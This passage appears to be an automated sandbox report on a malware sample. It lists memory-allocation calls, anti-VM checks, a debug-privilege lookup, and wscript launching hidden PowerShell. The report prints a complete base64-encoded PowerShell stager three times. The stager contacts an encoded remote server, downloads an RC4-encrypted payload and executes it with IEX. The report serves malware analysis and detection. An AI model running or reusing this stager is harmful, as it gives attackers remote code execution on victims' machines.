NtAllocateVirtualMemory April 3, 2023, 8:24 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f62000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2023, 8:24 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f75000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2023, 8:24 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ec5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2023, 8:24 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f6c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2023, 8:24 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02910000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2023, 8:24 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ec6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2023, 8:24 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f7c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2023, 8:24 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f63000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2023, 8:24 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f64000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2023, 8:24 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f65000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2023, 8:24 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f66000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2023, 8:24 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f67000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2023, 8:24 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f68000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2023, 8:24 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f69000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2023, 8:24 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2023, 8:24 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a61000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2023, 8:24 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a62000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2023, 8:24 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a63000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2023, 8:24 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a64000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2023, 8:24 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a65000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2023, 8:24 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a66000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2023, 8:24 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a67000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2023, 8:24 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a68000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2023, 8:24 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a69000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2023, 8:24 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a6a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2023, 8:24 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a6b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2023, 8:24 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a6c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2023, 8:24 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a6d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2023, 8:24 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a6e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2023, 8:24 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a6f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2023, 8:24 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2023, 8:24 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b21000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2023, 8:24 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b22000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2023, 8:24 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b23000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2023, 8:24 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b24000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6AFMAZQByAHYAZQByAEMAZQByAHQAaQBmAGkAYwBhAHQAZQBWAGEAbABpAGQAYQB0AGkAbwBuAEMAYQBsAGwAYgBhAGMAawAgAD0AIAB7ACQAdAByAHUAZQB9ADsAJABzAGUAcgA9ACQAKABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcARQBBAGMAQQBCAHAAQQBDADQAQQBiAFEAQgBwAEEASABNAEEAYwB3AEIAbABBAEcAUQBBAFoAdwBCAHMAQQBHADgAQQBZAGcAQgBoAEEARwB3AEEAYwBBAEIAaABBAEgASQBBAFkAdwBCAGwAQQBHAHcAQQBMAGcAQgBqAEEARwA4AEEAYgBRAEEAPQAnACkAKQApADsAJAB0AD0AJwAvAHIAbwB1AHQAZQAuAHAAaABwACcAOwAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkAHcAYwAuAFAAcgBvAHgAeQA9AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARABlAGYAYQB1AGwAdABXAGUAYgBQAHIAbwB4AHkAOwAkAHcAYwAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AE4AZQB0AHcAbwByAGsAQwByAGUAZABlAG4AdABpAGEAbABzADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQAgAD0AIAAkAHcAYwAuAFAAcgBvAHgAeQA7ACQASwA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AEIAeQB0AGUAcwAoACcAawBtAFgAUQB4AHoAXwA8AGwANQBaAC4AMwB7AC0AKwA9AD4ATgByACoAfgBWAGQAeQBAADcASQAvAHwAOQB9ACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAHIAZwBzADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBvAHUAbgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAeABvAHIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAIgBDAG8AbwBrAGkAZQAiACwAIgByAFUARQBCAHUASQA9AFgAZgBNAFkAZwByADMASwBEAFkAdgBBACsAMgA0ADcAcgA3ADUAaABOAEYAOQBEAHAAMQBrAD0AIgApADsAJABkAGEAdABhAD0AJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAcwBlAHIAKwAkAHQAKQA7ACQAaQB2AD0AJABkAGEAdABhAFsAMAAuAC4AMwBdADsAJABkAGEAdABhAD0AJABkAGEAdABhAFsANAAuAC4AJABkAGEAdABhAC4AbABlAG4AZwB0AGgAXQA7AC0AagBvAGkAbgBbAEMAaABhAHIAWwBdAF0AKAAmACAAJABSACAAJABkAGEAdABhACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA=

cmdline

powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6AFMAZQByAHYAZQByAEMAZQByAHQAaQBmAGkAYwBhAHQAZQBWAGEAbABpAGQAYQB0AGkAbwBuAEMAYQBsAGwAYgBhAGMAawAgAD0AIAB7ACQAdAByAHUAZQB9ADsAJABzAGUAcgA9ACQAKABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcARQBBAGMAQQBCAHAAQQBDADQAQQBiAFEAQgBwAEEASABNAEEAYwB3AEIAbABBAEcAUQBBAFoAdwBCAHMAQQBHADgAQQBZAGcAQgBoAEEARwB3AEEAYwBBAEIAaABBAEgASQBBAFkAdwBCAGwAQQBHAHcAQQBMAGcAQgBqAEEARwA4AEEAYgBRAEEAPQAnACkAKQApADsAJAB0AD0AJwAvAHIAbwB1AHQAZQAuAHAAaABwACcAOwAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkAHcAYwAuAFAAcgBvAHgAeQA9AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARABlAGYAYQB1AGwAdABXAGUAYgBQAHIAbwB4AHkAOwAkAHcAYwAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AE4AZQB0AHcAbwByAGsAQwByAGUAZABlAG4AdABpAGEAbABzADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQAgAD0AIAAkAHcAYwAuAFAAcgBvAHgAeQA7ACQASwA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AEIAeQB0AGUAcwAoACcAawBtAFgAUQB4AHoAXwA8AGwANQBaAC4AMwB7AC0AKwA9AD4ATgByACoAfgBWAGQAeQBAADcASQAvAHwAOQB9ACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAHIAZwBzADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBvAHUAbgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAeABvAHIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAIgBDAG8AbwBrAGkAZQAiACwAIgByAFUARQBCAHUASQA9AFgAZgBNAFkAZwByADMASwBEAFkAdgBBACsAMgA0ADcAcgA3ADUAaABOAEYAOQBEAHAAMQBrAD0AIgApADsAJABkAGEAdABhAD0AJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAcwBlAHIAKwAkAHQAKQA7ACQAaQB2AD0AJABkAGEAdABhAFsAMAAuAC4AMwBdADsAJABkAGEAdABhAD0AJABkAGEAdABhAFsANAAuAC4AJABkAGEAdABhAC4AbABlAG4AZwB0AGgAXQA7AC0AagBvAGkAbgBbAEMAaABhAHIAWwBdAF0AKAAmACAAJABSACAAJABkAGEAdABhACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA=

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW April 3, 2023, 8:24 a.m.	show_type: 0 filepath_r: powershell parameters: -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6AFMAZQByAHYAZQByAEMAZQByAHQAaQBmAGkAYwBhAHQAZQBWAGEAbABpAGQAYQB0AGkAbwBuAEMAYQBsAGwAYgBhAGMAawAgAD0AIAB7ACQAdAByAHUAZQB9ADsAJABzAGUAcgA9ACQAKABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcARQBBAGMAQQBCAHAAQQBDADQAQQBiAFEAQgBwAEEASABNAEEAYwB3AEIAbABBAEcAUQBBAFoAdwBCAHMAQQBHADgAQQBZAGcAQgBoAEEARwB3AEEAYwBBAEIAaABBAEgASQBBAFkAdwBCAGwAQQBHAHcAQQBMAGcAQgBqAEEARwA4AEEAYgBRAEEAPQAnACkAKQApADsAJAB0AD0AJwAvAHIAbwB1AHQAZQAuAHAAaABwACcAOwAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkAHcAYwAuAFAAcgBvAHgAeQA9AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARABlAGYAYQB1AGwAdABXAGUAYgBQAHIAbwB4AHkAOwAkAHcAYwAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AE4AZQB0AHcAbwByAGsAQwByAGUAZABlAG4AdABpAGEAbABzADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQAgAD0AIAAkAHcAYwAuAFAAcgBvAHgAeQA7ACQASwA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AEIAeQB0AGUAcwAoACcAawBtAFgAUQB4AHoAXwA8AGwANQBaAC4AMwB7AC0AKwA9AD4ATgByACoAfgBWAGQAeQBAADcASQAvAHwAOQB9ACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAHIAZwBzADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBvAHUAbgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAeABvAHIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAIgBDAG8AbwBrAGkAZQAiACwAIgByAFUARQBCAHUASQA9AFgAZgBNAFkAZwByADMASwBEAFkAdgBBACsAMgA0ADcAcgA3ADUAaABOAEYAOQBEAHAAMQBrAD0AIgApADsAJABkAGEAdABhAD0AJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAcwBlAHIAKwAkAHQAKQA7ACQAaQB2AD0AJABkAGEAdABhAFsAMAAuAC4AMwBdADsAJABkAGEAdABhAD0AJABkAGEAdABhAFsANAAuAC4AJABkAGEAdABhAC4AbABlAG4AZwB0AGgAXQA7AC0AagBvAGkAbgBbAEMAaABhAHIAWwBdAF0AKAAmACAAJABSACAAJABkAGEAdABhACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA= filepath: powershell	1	1	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses April 3, 2023, 8:24 a.m.	flags: 15 family: 0		111	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW April 3, 2023, 8:24 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

One or more non-whitelisted processes were created (2 events)

parent_process	wscript.exe				martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc 